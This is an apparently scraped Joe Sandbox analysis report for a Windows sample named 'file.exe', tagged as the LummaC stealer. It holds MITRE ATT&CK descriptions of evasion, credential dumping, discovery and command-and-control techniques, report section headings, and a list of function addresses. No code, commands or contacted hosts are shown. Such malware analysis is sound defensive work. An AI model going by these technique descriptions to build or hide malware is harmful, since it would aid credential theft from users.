Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
file.exe

Function 0024EC20 Relevance: 20.4, Strings: 16, Instructions: 397
COMMON

Function 0027BCA9 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 350
memoryCOMMON

Function 0024E1A0 Relevance: 11.8, Strings: 9, Instructions: 540
COMMON

Function 00250460 Relevance: 11.7, Strings: 9, Instructions: 454
COMMON

Function 002679B0 Relevance: 8.0, Strings: 6, Instructions: 507
COMMON

Function 0024F755 Relevance: 8.0, Strings: 6, Instructions: 466
COMMON

Function 00266022 Relevance: 6.5, Strings: 5, Instructions: 224
COMMON

Function 002715DC Relevance: 4.3, Strings: 3, Instructions: 561
COMMON

Function 0024CF90 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 195
COMMON

Function 00250CA0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 308
COMMON